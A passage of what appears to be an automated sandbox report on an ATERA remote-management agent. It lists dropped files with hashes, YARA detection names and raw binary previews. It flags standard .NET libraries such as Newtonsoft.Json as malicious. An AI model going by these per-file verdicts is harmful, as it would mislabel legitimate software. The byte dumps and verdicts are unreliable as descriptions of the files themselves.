                                                                                                                                                                                                                                        Preview:2024-12-17 12:46:58.3303|ERROR|WuApiService|Error on retry number 1: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....2024-12-17 12:48:30.4134|ERROR|WuApiService|Error on retry number 2: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....2024-12-17 12:50:38.5869|ERROR|WuApiService|Error on retry number 3: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....2024-12-17 12:52:32.7234|ERROR|AgentPackageOsUpdates|Error executin

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):92712
                                                                                                                                                                                                                                        Entropy (8bit):5.48308029356687
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:I2Ec05j4eAH64rh5fSt5T9nFcI94WYG76v:vlK4eA7mDmWYG4
                                                                                                                                                                                                                                        MD5:FAB1E6796418DA835C861AF332271C10
                                                                                                                                                                                                                                        SHA1:5FFB9F430BE3A9AE1D32A7BBDF592771E093846B
                                                                                                                                                                                                                                        SHA-256:A99C68919595987F3982E5BD87DA9E1D3ADA2A5CF83902DF5F74F84BA77560B7
                                                                                                                                                                                                                                        SHA-512:911CF5698BF7F806BB8E6EBB3990DC87A19CAC07E85EEC65611616049BDFA36978F142FDD24E97697180F8A4451E356C4B5A7EE4A1439B9AEB62BC2D0F8539D2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M..Z.........." ..0..8...........U... ...`....... ....................................@..................................U..O....`..,............B..((........................................................... ............... ..H............text....6... ...8.................. ..`.rsrc...,....`.......:..............@..@.reloc...............@..............@..B.................U......H.......P ...4..................,U......................................BSJB............v4.0.30319......l...|...#~.....d...#Strings....L3......#US.T3......#GUID...d3..x...#Blob......................3................................q.....2B........e$.M...,.M.....M...4.M...1.M...1.M..v..M...*.M...*.M....p...........................!.....).....1.....9.....A.....I.................................#.......+.......3.......;.J.....C.f.....K.f...................2.....................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3024920
                                                                                                                                                                                                                                        Entropy (8bit):7.999909909636524
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:qG/9p6ArK5mD89x/+gHaCubtJBePavnuS19BExgDGgkzEehiIVaiklpCWbjuHtpd:T/v6nFK5mLgkzZklfwpBRx
                                                                                                                                                                                                                                        MD5:A5CAA530EBA72B9C022A020CDBD9B747
                                                                                                                                                                                                                                        SHA1:7779AF820714DB278B4740D923885E17E143CC54
                                                                                                                                                                                                                                        SHA-256:AA7875B380B832872830A07BC0AFEF4D2C67E3D3159BAAED0B1AF113726354EF
                                                                                                                                                                                                                                        SHA-512:A4FB9A950753010B28D86F63601A711192C9D34475E44860CFC6A5142E13183786C5635F6E0F7DCBE01A9DE8D2D6FE368B2F5A3DB72149EF18CDBC78048EF59A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-........YI|.Z........?...AgentPackageProgramManagement/AgentPackageProgramManagement.exe....(.......wo.......I2...3=...nI......r/?.y?_5.8..YxR.k..?9..%F{'...U5Q...h.&J8....O..%1.C.....]`..^`.a.:.....u:......]..R4..wAR.,.U..8..m.yC...{F%...(..6...qq...E..U..4.a@x.......\.c. ...h..R2....z.s[[4.H...%]. .....g..&...v$y....M.b...|..t..&.3.r..5.,U.VXi..r...vI..#..rhF...x=i..0V..#u.9.:@...S.-...t..AK.m.$.tzh...-$.....mU.s....w.=...o1v3...@aG......j;....*).~....e....cr...]7X......{A..2V.{..@.!..p..V@h.FR...H".....'q.B.z.J...C..mo...."..W..h.B..X.4!....A......E.......V|.o{.G>...w.V.F...e..Q.S...1.j..jG...N`.>b....kkd}%.?.q....n.l.c.|%@.*... rz.C........F....KY.?.h).+s..J..\q.4.2.!-.;.7]......B..6.j.E...S"..|..."F.tRQA........v[...e....r..........lpk.W_.j.......5x.KG.0.......G@r.x.~H...y.d.w>.5m.EP..J..J...@1..T._Z....:.."3L.N/.......nF.;.R.$..g....6}X...PP.k..p....i......./......y....-dv......>w..9..|.EM..:.i....u.G."..&.$.7......F.1?.......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):57896
                                                                                                                                                                                                                                        Entropy (8bit):6.17368696309647
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:MJZ9Gx/x4S7IRyh+ngOBF3Q+ywIsybxZuYL6uKSRtYcFm7B6K+WEpYi60W:MJXA3ogMg+KTbxauZBm7Bl+X76X
                                                                                                                                                                                                                                        MD5:D6B7C686867602B045B64B932D752C10
                                                                                                                                                                                                                                        SHA1:6F9016683AB6A050784B6BC367CF4B2945B510AA
                                                                                                                                                                                                                                        SHA-256:99629E0CDD5D1C38C9E27A14D1478191371A9A3A5A561A2E8A757F951C5422ED
                                                                                                                                                                                                                                        SHA-512:5752DCAA41E267D5845655BDBBD1C7FDFDD6CDB32AC7E3EA2631FC1B402F5D88A62192765C5E7C4C55911C5F5558530EC35C69E1E6509193095A75B2B55FBD62
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`g.........."...0.................. ........@.. ....................... ............`.....................................O.......................((........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......HR..Dn...........................................................~....(....-..*.(....,..*(....~....(....(.....l(....(....*...0..3.......~....(....-.(...+*~....(.....(.....(....o....(...+*..0...........(.....~.....( ...*..0...........(.....~.....( ...*..0...........(....(......(!...*2.(....(....*v~....(....-.~"...*~....(....*...0...........(#....(.....o$...(%...*.0..g.......(&....('....o$......o(....s).......+......O...r...p(*...o+...&...X......i2..o,...o-........,..o.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1251
                                                                                                                                                                                                                                        Entropy (8bit):5.000868036244702
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdszvPF7N8OH2//3dVhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3sB7iOgl27Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                        MD5:16D1DF732FB7C3FE51EE9657C5AC458C
                                                                                                                                                                                                                                        SHA1:32CECF6AA8A03E11A967D54C67F9404F6A73D57B
                                                                                                                                                                                                                                        SHA-256:4FC493DA952DF0968311A06FAC3A5D03FBC2351DB77D0D907A1FAFA4ADA08777
                                                                                                                                                                                                                                        SHA-512:1F33ADA48F1ECAFA9238B87A8743C0A92953D123A917E38EC9F7EA7B92A7514AF6F244E4E3F77141D9ABDC11D120641FBDE9318525E0C3F2DC16F6E1D91634C9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>... <supportedRuntime version="v4.0" />... <supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <asse

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXTLQ:WBTk
                                                                                                                                                                                                                                        MD5:7B772E8870F15E5A324C99903FC1126C
                                                                                                                                                                                                                                        SHA1:4CECBD49501AA01F6AAE67E0EA7BEA6BBE149041
                                                                                                                                                                                                                                        SHA-256:8F3AD35D4A1E3005C66A375C8E6810FD9BCB838E30619DB970774AB9D6EDBA3E
                                                                                                                                                                                                                                        SHA-512:B223E084F58A309503C1CAD5374AF6DB1233E91BCDD429C9ACC08D349CAAEF64C12BA6D09B5AE8FB65866DDE4A4FF48AED4319794A7CEF3185F896A4788AED0D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=26.5

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):112168
                                                                                                                                                                                                                                        Entropy (8bit):6.177870485804748
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Pgs5os2RUW33uzNrscqSofyqwshFDfuX73QbQgLb/xs8bRUi+kEWWdK76tUzz:P0jjnl1wuDYjQbQgLbZs8DWdK5z
                                                                                                                                                                                                                                        MD5:C25E7CA39D0ACC6BA21C9B1BBC753C3F
                                                                                                                                                                                                                                        SHA1:E52624828F0E947C2DB437099B3D18E17B0EDA5D
                                                                                                                                                                                                                                        SHA-256:94C9D97A30117BE1451432CA55BD5E2B95C8E8C081D3DC691B90689BCEE73CB0
                                                                                                                                                                                                                                        SHA-512:77486714A175B5BE07F2143DD32E198FC1DB4AE102CED12015A0F4654F1186B619C2BDF695D87BE8C5F003CABD50C582C444FA75DB6ADF75D227F3A32D978397
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y.g.........." ..0.............b.... ........... ...............................y....`.....................................O.......8...............((.......................................................... ............... ..H............text...h.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................D.......H....... ....!...........................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p( ...r...p(!.........("...(#.....&..*........00......:.(......}....*..0..Z............($...,......(%...*~..........(&........($...-..(....s'...........,..((.........(%...*..........&E.......0..G........{....,.(......5~)...r'..po*...rm..pr...po+...ta...r...p(,..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\CredentialManagement.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):38952
                                                                                                                                                                                                                                        Entropy (8bit):6.311706918648539
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:zINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wg6:UNsii6v/HS0+OJd5gpKm76tg6
                                                                                                                                                                                                                                        MD5:A7A0C1A3E93D2A9609335E3F7B7D8FB8
                                                                                                                                                                                                                                        SHA1:846C6F9B6F7303395B2D8DCCD0E8592B92E15526
                                                                                                                                                                                                                                        SHA-256:6E2A4A4C82996F1254CBAAD043A1964F30340147025716C8F934DB5FB1FC1CA5
                                                                                                                                                                                                                                        SHA-512:0ED532225DF6AD0B02240EEDA4A9E0F2FC8157BEB4A0C2524B8A6245722133D4954C1CD3ACC461992D7610AEB3290BADB6EFF099D529308769C41F03907C9DFA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..T...........!.....f............... ........... ....................................@....................................O....................p..((........................................................... ............... ..H............text...$d... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B........................H........2...O...........................................................0..+.......s.........~....%.(.....s............(.....*..........#........,..%{.....`}....*.%{.....f_}....*..0..>.......................(....}=......}>......( ...}@......(....}?....*R.{....,.r...ps....z*:..(.....(....*...0............(.......(.....*...................J.{....-..&..}....*6.(.....{....*:.(......}....*6.(.....{....*..(.....(....,.r]..ps....z.o ... ....1.r]..ps!...z..}....*6.(.....{....*..(...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):670
                                                                                                                                                                                                                                        Entropy (8bit):4.870186870231866
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:5lh3rwhI4IaMFj27/tUYCQpU0E+dqo6rHQknd77psLlO:l334IaJUuU0E+QHQk17psLlO
                                                                                                                                                                                                                                        MD5:B4ECFC2FF4822CE40435ADA0A02D4EC5
                                                                                                                                                                                                                                        SHA1:8AAF3F290D08011ADE263F8A3AB4FE08ECDE2B64
                                                                                                                                                                                                                                        SHA-256:A42AC97C0186E34BDC5F5A7D87D00A424754592F0EC80B522A872D630C1E870A
                                                                                                                                                                                                                                        SHA-512:EAFAC709BE29D5730CB4ECD16E1C9C281F399492C183D05CC5093D3853CDA7570E6B9385FBC80A40FF960B5A53DAE6AE1F01FC218E60234F7ADCED6DCCBD6A43
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview: Copyright (c) 2017 Chocolatey Software, Inc... Copyright (c) 2011 - 2017 RealDimensions Software, LLC.... Licensed under the Apache License, Version 2.0 (the "License");.. you may not use this file except in compliance with the License... You may obtain a copy of the License at.... http://www.apache.org/licenses/LICENSE-2.0.... Unless required by applicable law or agreed to in writing, software.. distributed under the License is distributed on an "AS IS" BASIS,.. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied... See the License for the specific language governing permissions and.. limitations under the License.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398888
                                                                                                                                                                                                                                        Entropy (8bit):6.134162391255298
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:tjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvS:t+e55LgIkTmyAAfTnMLvS
                                                                                                                                                                                                                                        MD5:EF932F62787FC97AB86C868A6997D674
                                                                                                                                                                                                                                        SHA1:045B8179AA00C5BE0CC902C0A64819BF4F81E90E
                                                                                                                                                                                                                                        SHA-256:C8D5992C31960EBDA20490F25AD96C50E155C97C648E9E2E36FDD5EE6A13BEF3
                                                                                                                                                                                                                                        SHA-512:76DAA329C7082FD8C0055F47762980F738872060E97304F09DE899FF1EA158D72DF1F9491CAC0D63D7434DE069BB9BF1D1ABC3B920930FA720DCC16DB1D0118D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`......K=....`.................................v...O.... ..................((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710184
                                                                                                                                                                                                                                        Entropy (8bit):5.9605883376443005
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:zBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUV:zBjk38WuBcAbwoA/BkjSHXP36RMGI
                                                                                                                                                                                                                                        MD5:93FB51465859E7E7D6601B08CDFA8CA3
                                                                                                                                                                                                                                        SHA1:22806A0E6E117FCBF47D7AB1B38466721906EC84
                                                                                                                                                                                                                                        SHA-256:C1BCAD2B09B37B58E8AD40765318C10C276C61634D29B34A4BBC6CF8328116C4
                                                                                                                                                                                                                                        SHA-512:6D8752A75FDE027B9889D35BB37F35D2FAA7246104576A486A5D13145678AB8963FE911F78F8C43092ED961A29A9A1A13C5BAABA6844AC04007F5639DF8E7407
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... .......}....`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22056
                                                                                                                                                                                                                                        Entropy (8bit):6.675796518163144
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Ay/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOq08N:AuhMaVmzDC6k0EpYi60hN
                                                                                                                                                                                                                                        MD5:867FD56DF9DA65A73E4398B94601075C
                                                                                                                                                                                                                                        SHA1:AE16CD1441533D219BF2C88F80D404D0FC76F1C2
                                                                                                                                                                                                                                        SHA-256:2B33511C3D429B806845B340B6D71F4711C5AE2F3F8161309FE1E6FD9A017FBC
                                                                                                                                                                                                                                        SHA-512:AE1F51F4434D21A62B6F6954A2FC7EDCC07EC1EB4A3BDA263F494428A136C2794C5D56CD2EB889F90CF79BBCB96758C157EE184E7726263ADE5C9DB94E48DD2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............((...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64040
                                                                                                                                                                                                                                        Entropy (8bit):6.266486749126179
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:9YDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607z4Z9:9KC9niwOepJ6TJPeb6NIUFg76Kz4Z9
                                                                                                                                                                                                                                        MD5:209C40ED640F5B1559F6101261C57B67
                                                                                                                                                                                                                                        SHA1:B6B362984E3344020800D92DEC6B08F22953E53B
                                                                                                                                                                                                                                        SHA-256:1610457E621745C88CE37B463E6F4FBFB2DE51B8ABD033C756725F709BCFA545
                                                                                                                                                                                                                                        SHA-512:6E86E509CA2D2D87DA54E6D3E6E1E2929AC898D9A7AC13F744EC8E00F93DC2119E21F25C3811AC2E975E74C8FCCA2C0184DD11C19D0D4A6B51D7E1FD0FCF93DA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[............" ..0.................. ........... .......................@...... O....`.................................k...O....... ...............((... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........[..h...........(.......0.........................................{#...*:.($.....}#...*..0..#........u......,.(%....{#....{#...o&...*.*v ..yN )UU.Z(%....{#...o'...X*....0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*:.($.....}*...*.0..#........u......,.(%....{*....{*...o&...*.*v ..:. )UU.Z(%....{*...o'...X*....0..M........r-..p......%..{*....................-.q.............-.&.+.......o(....()...*..{+...*..{,...*V.($...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138280
                                                                                                                                                                                                                                        Entropy (8bit):6.178284916873051
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:kP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJHu:kh0qjC5RMOHO420kN11
                                                                                                                                                                                                                                        MD5:886B765792DCE94114D2AD06F79E3F58
                                                                                                                                                                                                                                        SHA1:FB1596F2B5104E68F65B5730BB5C4601370B5F80
                                                                                                                                                                                                                                        SHA-256:9C4591BE45BDEDBAC83A0FD9C4DE28DD60EF442D686FCB709C048B66C45A8398
                                                                                                                                                                                                                                        SHA-512:586E4D036E38A391DABA353C1D7B45345996EBB16FA402D2475C42A59B7B959575A7ED264ADE93EB26DF0A8DE386D563692317508D44F033A6602F13542391B6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`....../{....@.................................3...O.... ..0...............((...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17960
                                                                                                                                                                                                                                        Entropy (8bit):6.635009457377427
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:STO9dQWXYW8a6gNyb8E9VF6IYijSJIVxJF08Nhp:SCn6xYEpYi60k8N
                                                                                                                                                                                                                                        MD5:E7E34C7CC03503B4DA72E26434BE71E1
